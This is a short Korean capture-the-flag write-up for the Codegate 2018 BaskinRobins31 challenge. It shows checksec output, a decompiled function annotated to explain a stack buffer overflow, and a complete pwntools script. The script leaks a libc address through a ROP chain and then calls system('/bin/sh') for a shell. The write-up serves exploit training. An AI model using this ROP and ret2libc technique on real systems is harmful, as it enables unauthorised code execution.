Codegate2018 - BaskinRobins31 본문
간단한 64비트 버퍼오버플로우입니다.
Mitigation
ihaechan@ubuntu:~/Desktop$ ./pwnable/checksec.sh --file ./BaskinRobins31
RELRO STACK CANARY NX PIE RPATH RUNPATH FILE
Partial RELRO No canary found NX enabled No PIE No RPATH No RUNPATH ./BaskinRobins31
ihaechan@ubuntu:~/Desktop$
vulnerability
/*
 * Decompiled your_turn() from the challenge binary (decompiler output kept
 * verbatim, including its register/stack-slot annotations). It reads the
 * player's move into a stack buffer, echoes it back, parses the leading
 * decimal number and, if check_decision() accepts it, subtracts it from *a1
 * (presumably the remaining count) and returns 1; otherwise it returns 0.
 *
 * Defect: read() is allowed up to 0x190 bytes into `s`, which lies 0xB0 bytes
 * below the saved rbp and is only ever cleared for 0x96 bytes. Input longer
 * than 0xB0 bytes therefore runs over the locals, the saved rbp and the return
 * address. The checksec output above shows no stack canary and no PIE, so the
 * overwrite is not detected and code/GOT addresses are fixed. The fix is to
 * bound the read to the buffer's actual size and to check read()'s return
 * value before reusing it as a length.
 */
signed __int64 __fastcall your_turn(_DWORD *a1)
{
signed __int64 result; // rax
char s; // [rsp+10h] [rbp-B0h]   -- 0xB0 bytes sit between s and the saved rbp
size_t n; // [rsp+B0h] [rbp-10h]
int v4; // [rsp+BCh] [rbp-4h]
v4 = 0;
memset(&s, 0, 0x96uLL); // clears 0x96 bytes: the size the buffer was meant to hold
puts("How many numbers do you want to take ? (1-3)");
n = read(0, &s, 0x190uLL); // stack buffer overflow: 0x190 exceeds both 0x96 and the 0xB0 bytes up to the saved rbp
write(1, &s, n); // echoes the whole input back; n is read()'s raw return, so a -1 would become SIZE_MAX here
putchar(10);
v4 = strtoul(&s, 0LL, 10); // only the leading decimal digits matter for the game logic; the rest of the input is ignored
if ( check_decision(v4, 0LL) )
{
*a1 -= v4;
result = 1LL;
}
else
{
puts("Don't break the rules...:( ");
result = 0LL;
}
return result;
}
그냥 간단한 버퍼오버플로우입니다.
exploit
from pwn import *
s = process("/home/ihaechan/Desktop/BaskinRobins31")
#s = remote("ch41l3ng3s.codegate.kr",3131)
print s.recvuntil("There are 31 number(s)")
print s.recvuntil("How many numbers do you want to take ? (1-3)")
magic = 0x040087A
write_plt = 0x4006d0
write_got = 0x602028
payload = "2\n"
payload +="\x90"*0xae + "\x90"*8
payload += p64(magic)
payload += p64(1)
payload += p64(write_got)
payload += p64(8)
payload += p64(write_plt)
payload += p64(0x4008A4)
s.send(payload)
print s.recv(1024)
s.recvuntil(p64(0x4006d0))
libc_leak = u64(s.recvuntil("\x7f")[-6:] + "\x00"*2) - 0xf72b0
print "libc_base : " + hex(libc_leak)
print s.recvuntil("How many numbers do you want to take ? (1-3)")
payload2 = "\x90"*0xb0+"\x90"*8
payload2 += p64(magic)
payload2 += p64(0)
payload2 += p64(0x602079)
payload2 += p64(0x10)
payload2 += p64(0x400700)
payload2 += p64(magic)
payload2 += p64(0x602079)
payload2 += p64(0) + p64(0)
payload2 += p64(libc_leak + 0x45390)
s.send(payload2)
s.send("/bin/sh\x00")
s.interactive()